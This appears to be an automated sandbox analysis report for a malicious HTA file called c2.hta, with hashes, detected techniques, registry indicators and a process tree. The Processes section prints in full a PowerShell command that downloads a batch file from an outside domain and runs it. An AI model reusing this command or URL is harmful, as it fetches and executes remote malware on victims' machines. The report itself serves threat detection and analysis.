Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-01-2025 21:52
Static task
static1
Behavioral task
behavioral1
Sample
c2.hta
Resource
win7-20240903-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
c2.hta
Resource
win10v2004-20241007-en
windows10-2004-x64
22 signatures
150 seconds
General
-
Target
c2.hta
-
Size
1KB
-
MD5
ad959a16fe9d80c18b39e7b57bf7ca71
-
SHA1
16cd44bda6f1ab39811c990b316f2176a28542f0
-
SHA256
41b558fa4bdb281c1b7bf0fc73937b4e4f1caa3beccb752f3082cb665680aa40
-
SHA512
5da0c61428ef1dbd27adb43db5541ea568f311340e636df17d0c7d9dc4e3207c6ad6a264ede8c8b65680606cc6134ca5e93610355c0db6ba5581d8a80e27c5c4
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://candwfarmsllc.com/c2.bat
Signatures
-
pid Process 2984 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2984 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2260 wrote to memory of 2984 2260 mshta.exe 30 PID 2260 wrote to memory of 2984 2260 mshta.exe 30 PID 2260 wrote to memory of 2984 2260 mshta.exe 30 PID 2260 wrote to memory of 2984 2260 mshta.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-